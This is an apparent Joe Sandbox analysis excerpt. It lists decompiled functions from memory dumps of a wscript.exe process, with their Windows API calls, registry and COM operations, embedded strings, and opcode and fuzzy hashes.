                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 1e61f7f47a5a59258d0e49c4eb1e25a2099983a0b4f8c6d79480c034c4a21a81
                                            • Instruction ID: e600a1632f2b6a7a852cf7646eec668e58a9a41ea37935c761322ad8ea74485d
                                            • Opcode Fuzzy Hash: 1e61f7f47a5a59258d0e49c4eb1e25a2099983a0b4f8c6d79480c034c4a21a81
                                            • Instruction Fuzzy Hash: 1EC04830818200EBEF429BB4EC0CF553A2ABB06306F290098A50A880B0C6764090EB12
                                            Function 009B89B1 Relevance: 54.7, APIs: 24, Strings: 7, Instructions: 425registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoGetMalloc.OLE32(00000001,?,00000000,00000000,?), ref: 009B8A04
                                            • LoadRegTypeLib.OLEAUT32(009B39F4,00000001,00000000,00000000,?), ref: 009B8A24
                                            • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 009B8A78
                                            • StringFromCLSID.OLE32(?,?), ref: 009B8AA2
                                            • SysFreeString.OLEAUT32(?), ref: 009B8C1A
                                            • StringFromCLSID.OLE32(?,?), ref: 009B8C71
                                            • SysStringLen.OLEAUT32(?), ref: 009B8CDB
                                            • sprintf_s.MSVCRT ref: 009B8D04
                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 009B8D1E
                                            • RegQueryValueA.ADVAPI32(?,Version,?,?), ref: 009B8D4D
                                            • RegDeleteKeyA.ADVAPI32(?,LocalServer32), ref: 009B8D7B
                                            • RegDeleteKeyA.ADVAPI32(?,TypeLib), ref: 009B8D8C
                                            • RegDeleteKeyA.ADVAPI32(?,Version), ref: 009B8D99
                                            • RegDeleteKeyA.ADVAPI32(?,ProgID), ref: 009B8DAA
                                            • RegCloseKey.ADVAPI32(?), ref: 009B8DB6
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 009B8DC6
                                            • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 009B8DDA
                                            • RegDeleteKeyA.ADVAPI32(?,CLSID), ref: 009B8DEF
                                            • RegCloseKey.ADVAPI32(?), ref: 009B8DFB
                                            • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 009B8E03
                                            • RegCloseKey.ADVAPI32(?), ref: 009B8E11
                                            • UnRegisterTypeLib.OLEAUT32(009B39F4,00000001,00000000,00000000,00000001), ref: 009B8E3D
                                            • RegCloseKey.ADVAPI32(00000000), ref: 009B8F44
                                            • SysFreeString.OLEAUT32(?), ref: 009B8F50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Delete$String$Close$Open$FreeFromType$LoadMallocQueryRegisterValuesprintf_s
                                            • String ID: $1.0$CLSID$LocalServer32$ProgID$TypeLib$Version
                                            • API String ID: 418931453-1178591435
                                            • Opcode ID: 7ef939d21fc885bef61398a8ba5d9cbbc4e1807d95107d0ee56103b188679847
                                            • Instruction ID: 642d7948b7c1683e81779ff8604dd1fe4d7bb354d41015c43627a825a80148e3
                                            • Opcode Fuzzy Hash: 7ef939d21fc885bef61398a8ba5d9cbbc4e1807d95107d0ee56103b188679847
                                            • Instruction Fuzzy Hash: 23F15D71A10225DFDB209B64DD89FAEB7B9BF4C714F1440A9E609A7261CF309D82CF51
                                            Function 009BA917 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 454libraryloaderwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C2196: GetACP.KERNEL32(00000000,009B10C4,009BA948,?,00000000,00000000), ref: 009C21A4
                                            • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800), ref: 009BA9A5
                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 009BA9BB
                                            • FreeLibrary.KERNEL32(00000000), ref: 009BA9CC
                                              • Part of subcall function 009B9456: SysAllocString.OLEAUT32(?), ref: 009B9534
                                              • Part of subcall function 009B9456: SysFreeString.OLEAUT32(?), ref: 009B97B0
                                            • FreeLibrary.KERNEL32(00000000), ref: 009BA9F8
                                            • CoRegisterMessageFilter.OLE32(00000000,00000008), ref: 009BAA41
                                            • GetModuleFileNameW.KERNEL32(?,00000105), ref: 009BAA70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeLibrary$String$AddressAllocFileFilterLoadMessageModuleNameProcRegister
                                            • String ID: HeapSetInformation$Open2$W$kernel32.dll
                                            • API String ID: 1008295733-585330253
                                            • Opcode ID: 515e1b99015d9f562263821de777af4cac4dd4231f4ce0e4cce0db48ab4ed3bf
                                            • Instruction ID: ee6c08068f690a483fccc65571e3b9b8896d1f43263187f4a60324da3a0d2cb4
                                            • Opcode Fuzzy Hash: 515e1b99015d9f562263821de777af4cac4dd4231f4ce0e4cce0db48ab4ed3bf
                                            • Instruction Fuzzy Hash: 04F1C2706083819FDB20DF24C989BEE7BE9AF84324F15085DE88A97292DB74DC45CB57
                                            Function 009BA46F Relevance: 18.1, APIs: 12, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(009B1100,00000000,-00000001,009B1100,009B10C4), ref: 009BA4A1
                                            • GetLastError.KERNEL32 ref: 009BA4AD
                                            • __alloca_probe_16.LIBCMT ref: 009BA4C1
                                            • GetFileVersionInfoW.VERSION(009B1100,00000000,00000000), ref: 009BA4CE
                                            • VerQueryValueW.VERSION(?,009B3BE0,?,00000001), ref: 009BA4E6
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009B1100,000000FF,00000000,00000000,00000000,00000000,-00000001,009B1100,009B10C4), ref: 009BA522
                                            • __alloca_probe_16.LIBCMT ref: 009BA532
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009B1100,000000FF,?,00000000,00000000,00000000), ref: 009BA54F
                                            • GetFileVersionInfoSizeA.VERSION(?,00000000,?,00000000,00000000,00000000), ref: 009BA562
                                            • __alloca_probe_16.LIBCMT ref: 009BA572
                                            • GetFileVersionInfoA.VERSION(?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 009BA57F
                                            • VerQueryValueA.VERSION(?,009B3BE4,?,00000001,?,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000), ref: 009BA59B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FileInfoVersion$__alloca_probe_16$ByteCharMultiQuerySizeValueWide$ErrorLast
                                            • String ID:
                                            • API String ID: 467288509-0
                                            • Opcode ID: 243a9a29c14dc68df186b29cf5d7efc6c99c836029d8df7bebd0570c5746274b
                                            • Instruction ID: 5b64ad2aff05b866ab573ba48a9c81579368f6ee8e0612d7904525c7f892393d
                                            • Opcode Fuzzy Hash: 243a9a29c14dc68df186b29cf5d7efc6c99c836029d8df7bebd0570c5746274b
                                            • Instruction Fuzzy Hash: B6319CB1A14219BF9B10DFA5DD88EFF7BBDEF493207104129B812D3250DA74DE008AB2
                                            Function 04DA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 1ffe2921d759a7bb53210af29d2ffcc0ff949be3801e6029305dd4f7357f643b
                                            • Instruction ID: f5fca33ce1d09ab4c379bc4cbff9b30ed014a4a25c9d619eda44f2265c41e367
                                            • Opcode Fuzzy Hash: 1ffe2921d759a7bb53210af29d2ffcc0ff949be3801e6029305dd4f7357f643b
                                            • Instruction Fuzzy Hash: 3951E8B6B00116BFDB10DFA9899097EF7B8BB09704B10C269E4A5D7741E234FE108BE1
                                            Function 04E12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 316f0bc4e3313f2c618bd8dcc661455c9876d2a2276fd213fbc1b057d1b0c9a6
                                            • Instruction ID: 22755625dc0b7b20d85bac44e7e5e976d921338c3b4fe88144547aeefd9ffc3a
                                            • Opcode Fuzzy Hash: 316f0bc4e3313f2c618bd8dcc661455c9876d2a2276fd213fbc1b057d1b0c9a6
                                            • Instruction Fuzzy Hash: 29510571B40645AFDB34DF9CCC9087FBBF9EB44204B048499E6D6E7651EA74FA408B60
                                            Function 009C5C39 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 168registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(00000000,Enabled,00000000,?,?,?,00000000,00000000,Enabled), ref: 009C5C99
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,Enabled), ref: 009C5CE0
                                            • GetLastError.KERNEL32 ref: 009C5CEC
                                            • __alloca_probe_16.LIBCMT ref: 009C5CF6
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,00000000,00000000,00000000), ref: 009C5D0E
                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,00000000,00000000,Enabled), ref: 009C5D4E
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000400), ref: 009C5DB2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$QueryValue$ErrorLast__alloca_probe_16
                                            • String ID: Enabled$false
                                            • API String ID: 421531244-109718029
                                            • Opcode ID: 1a7a681517d863d4e8da9bbaced968bb5b289e55ae9a223580c8ccddad4e0e20
                                            • Instruction ID: 596ca5c014d08bf204c519e7a9ddc19cfcd74339c7b6d43db032c7166edcd2f9
                                            • Opcode Fuzzy Hash: 1a7a681517d863d4e8da9bbaced968bb5b289e55ae9a223580c8ccddad4e0e20
                                            • Instruction Fuzzy Hash: 8251C770E04615AAEB24DB25CC44FBBB77DEB85310F21839DA556D3190EF30AEC4CA61
                                            Function 009BFD12 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75windowregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClassInfoA.USER32(00000000,WSH-Timer,?), ref: 009BFD34
                                            • RegisterClassA.USER32(?), ref: 009BFD60
                                            • SetEvent.KERNEL32(?), ref: 009BFD6E
                                            • GetLastError.KERNEL32 ref: 009BFD74
                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?), ref: 009BFD94
                                            • SetEvent.KERNEL32(?), ref: 009BFDA6
                                            • DispatchMessageA.USER32(?), ref: 009BFDB7
                                            • GetMessageA.USER32(?,?,00000000,00000000), ref: 009BFDC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ClassEventMessage$CreateDispatchErrorInfoLastRegisterWindow
                                            • String ID: WSH-Timer
                                            • API String ID: 2425405920-2323048385
                                            • Opcode ID: 6c40e18f60ef256074887c2ec320305c11794a1a214346a2c3a2141a0566f9fa
                                            • Instruction ID: 7b792206f8eb9dd360382407023410e422aa87bdf2dbe859d962f738cb336336
                                            • Opcode Fuzzy Hash: 6c40e18f60ef256074887c2ec320305c11794a1a214346a2c3a2141a0566f9fa
                                            • Instruction Fuzzy Hash: 5521D4B1D14209ABCF209FA6DD4CDEFBBB8EFD4760B14452AF451A2260D7749806DB60
                                            Function 04D97630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • ExecuteOptions, xrefs: 04DD46A0
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04DD4725
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04DD4742
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04DD4655
                                            • Execute=1, xrefs: 04DD4713
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04DD46FC
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04DD4787
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 0672e4799af2155ec458b71a4765b59d5909093030c29342c8593ef803f38dc2
                                            • Instruction ID: ebcdd4696c4492d64730fef849e16c99b6b074f0fd3c73114e9cb0e63be51ae4
                                            • Opcode Fuzzy Hash: 0672e4799af2155ec458b71a4765b59d5909093030c29342c8593ef803f38dc2
                                            • Instruction Fuzzy Hash: C851C231750219BBEF10BEA5DC99BEE77E8FB44304F0405A9E505EB191EB70BE458E60
                                            Function 009C1C00 Relevance: 13.8, APIs: 9, Instructions: 341memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 009C1CD0
                                            • wcscpy_s.MSVCRT ref: 009C1CEC
                                            • wcscat_s.MSVCRT ref: 009C1CF9
                                            • SetErrorInfo.OLEAUT32(00000000,00000000), ref: 009C1EB3
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • VariantInit.OLEAUT32(?), ref: 009C1E10
                                            • VariantCopy.OLEAUT32(?,?), ref: 009C1E43
                                            • VariantClear.OLEAUT32(?), ref: 009C1F0C
                                            • SysFreeString.OLEAUT32(00000000), ref: 009C1F3E
                                            • SysFreeString.OLEAUT32(?), ref: 009C1F4C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: StringVariant$Free$AllocClearCopyErrorInfoInitmallocwcscat_swcscpy_s
                                            • String ID:
                                            • API String ID: 3780719979-0
                                            • Opcode ID: 60cb83b754af6201a6bd4e50efdaa9d11aa068bb6b1e5c7c259e12e50bee37b2
                                            • Instruction ID: 288e1b07427264ed5749a6d7a345dc05d0a347cbd50a1b5d6a82fd99dc824052
                                            • Opcode Fuzzy Hash: 60cb83b754af6201a6bd4e50efdaa9d11aa068bb6b1e5c7c259e12e50bee37b2
                                            • Instruction Fuzzy Hash: 6DC16871E00219AFCB14CF98D884EAEBBB5FF49710F25416DE906AB291D730AD42CB95
                                            Function 009C50BE Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFullPathNameW.KERNEL32(009C2AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 009C50EC
                                            • GetLastError.KERNEL32 ref: 009C50FA
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009C2AFB,000000FF,00000000,00000000,00000000,00000000,00000104,?,?,?,?,?), ref: 009C5121
                                            • __alloca_probe_16.LIBCMT ref: 009C512D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharErrorFullLastMultiNamePathWide__alloca_probe_16
                                            • String ID:
                                            • API String ID: 187176378-0
                                            • Opcode ID: 0438331cde612927d66eaab81012524c67b2b44236ad0b0710bdcad0ad12ebdd
                                            • Instruction ID: 74d5df49db650b0e9882e922a94822b4816a1df3f0484dc2e8bb266605c865a7
                                            • Opcode Fuzzy Hash: 0438331cde612927d66eaab81012524c67b2b44236ad0b0710bdcad0ad12ebdd
                                            • Instruction Fuzzy Hash: CE31D235E19525BB9B209B6A8C4CFAB7F6CEF86760B154128B819D6290CA30DE41C7F1
                                            Function 009C5846 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C5873
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74), ref: 009C589D
                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000,?,?,?,009B8FB7,00000000,00000000), ref: 009C58AA
                                            • __alloca_probe_16.LIBCMT ref: 009C58B4
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000), ref: 009C58C8
                                            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C58DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiOpenWide$ErrorLast__alloca_probe_16
                                            • String ID: Software\Microsoft\Windows Script Host\Settings
                                            • API String ID: 2927149995-2126348837
                                            • Opcode ID: a4fd208ac849d61bca4a5b9748e9f19da60ec1c205ecdd2950df959ae8ecd12d
                                            • Instruction ID: 94972d9ebbef1b1a87f0956d08f757b9bdd8e9555c956c065adfe09254a566e0
                                            • Opcode Fuzzy Hash: a4fd208ac849d61bca4a5b9748e9f19da60ec1c205ecdd2950df959ae8ecd12d
                                            • Instruction Fuzzy Hash: 26112674E18611BFEB209B725C08F7B7ABCEF447A0F11852DB816D6190DA70EC40E6B1
                                            Function 009C5901 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,009B10C4,00000000,00000000,?,009C21E8), ref: 009C5933
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,-00000001,?,009B10C4,00000000,00000000,?,009C21E8,00020019), ref: 009C5955
                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009C21E8,00020019,00000000,009B1100,?,?,?,009BAB73,80000002,009B10E4), ref: 009C5961
                                            • __alloca_probe_16.LIBCMT ref: 009C596B
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,009C21E8,00020019,00000000,009B1100,?,?), ref: 009C5982
                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,009C21E8,00020019), ref: 009C599B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateMultiWide$ErrorLast__alloca_probe_16
                                            • String ID: Software\Microsoft\Windows Script Host\Settings
                                            • API String ID: 3071801306-2126348837
                                            • Opcode ID: f71b8b0e38af77e8eda9a3cb11ca18c8b73d509a106390c7aa5c3a747ec70adf
                                            • Instruction ID: 26de9c37eb8e0d1eaa2c359624d078e53a5e63e71fdda50dc734c211b056da0c
                                            • Opcode Fuzzy Hash: f71b8b0e38af77e8eda9a3cb11ca18c8b73d509a106390c7aa5c3a747ec70adf
                                            • Instruction Fuzzy Hash: 3311BE31A1A534FB9B219B678C0CFEB7EACEF4B7B0B514119B419D1190DA349A00E6F2
                                            Function 009C4153 Relevance: 12.2, APIs: 8, Instructions: 225memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 009C41EA
                                            • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 009C4209
                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 009C42B3
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 009C42CF
                                            • VariantClear.OLEAUT32(?), ref: 009C42DB
                                            • SysAllocString.OLEAUT32(?), ref: 009C431F
                                            • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 009C4343
                                            • VariantClear.OLEAUT32(?), ref: 009C434F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ArraySafe$AllocClearCreateElementStringVariant$malloc
                                            • String ID:
                                            • API String ID: 2320673430-0
                                            • Opcode ID: a5990a205694e4d3def1185d9f2d54908ce5914e7f143ebda44067fc23b38f03
                                            • Instruction ID: 4b5d97ec91d0365d24cfc74c4d097cdbaa08b6fcedd42619f3cc58abb721dccc
                                            • Opcode Fuzzy Hash: a5990a205694e4d3def1185d9f2d54908ce5914e7f143ebda44067fc23b38f03
                                            • Instruction Fuzzy Hash: C7719C71F0021A9BDB14CFA4D9A5FAEB7F8EF98710F54442EE951E7280DB709A42CB41
                                            Function 009C405C Relevance: 12.1, APIs: 8, Instructions: 57memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.MSVCRT ref: 009C4064
                                            • SysStringLen.OLEAUT32(?), ref: 009C4087
                                            • SysAllocString.OLEAUT32(?), ref: 009C4095
                                            • SysStringLen.OLEAUT32(?), ref: 009C40A5
                                            • SysAllocString.OLEAUT32(?), ref: 009C40B2
                                            • SysFreeString.OLEAUT32(?), ref: 009C40C8
                                            • SysFreeString.OLEAUT32(?), ref: 009C40D7
                                            • free.MSVCRT(00000000,?,009C3EE1,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C40DE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$AllocFree$freemalloc
                                            • String ID:
                                            • API String ID: 945414394-0
                                            • Opcode ID: 97d02045c55eb69f145546862f376af88026c0ff601d7fcbb2566f8304fe90dc
                                            • Instruction ID: 994f35206dcb84454ec4973327c553b9623536110b702d675fbbbc04c5279339
                                            • Opcode Fuzzy Hash: 97d02045c55eb69f145546862f376af88026c0ff601d7fcbb2566f8304fe90dc
                                            • Instruction Fuzzy Hash: 76113A31A84606ABDB31DF25EC18F46BBA5EF04360F10892DF9A5926A0DB31D861DA52
                                            Function 009B9456 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 262memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SysFreeString.OLEAUT32(?), ref: 009B97B0
                                              • Part of subcall function 009B99DC: CoCreateInstance.OLE32(009B3980,00000000,00000017,009B3BD0,009B1324,00000000,009B10C4,00000001,009B10C4,?,009B94CB,-00000001,009B1100), ref: 009B9A0A
                                              • Part of subcall function 009BFDD5: GetCurrentThreadId.KERNEL32 ref: 009BFE04
                                              • Part of subcall function 009C50BE: GetFullPathNameW.KERNEL32(009C2AFB,00000104,?,?,00000104,?,?,?,?,?), ref: 009C50EC
                                              • Part of subcall function 009C50BE: GetLastError.KERNEL32 ref: 009C50FA
                                            • SysAllocString.OLEAUT32(?), ref: 009B9534
                                            • SysAllocString.OLEAUT32(?), ref: 009B9554
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$Alloc$CreateCurrentErrorFreeFullInstanceLastNamePathThread
                                            • String ID: .wsf
                                            • API String ID: 1820159607-2429851548
                                            • Opcode ID: 480196faafd58bf724b396aac96c34fd4b7d7d66475b6aa870e4a7ce067949b8
                                            • Instruction ID: fd106a4dce22a284660213e6ae2c532a153470a97afdc4296f94c60db0911d05
                                            • Opcode Fuzzy Hash: 480196faafd58bf724b396aac96c34fd4b7d7d66475b6aa870e4a7ce067949b8
                                            • Instruction Fuzzy Hash: FF91F430B202199BDB209F65DED8BEE77E9AF98724F1000A9E609D7351DF74ED418B50
                                            Function 009BF040 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 246COMMON
                                            Download Yara Rule
                                            APIs
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2AB
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2B4
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2BD
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2C6
                                            • SysFreeString.OLEAUT32(?), ref: 009BF2CF
                                            Strings
                                            • WScript_OnScriptTerminate, xrefs: 009BF20E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: FreeString
                                            • String ID: WScript_OnScriptTerminate
                                            • API String ID: 3341692771-526745235
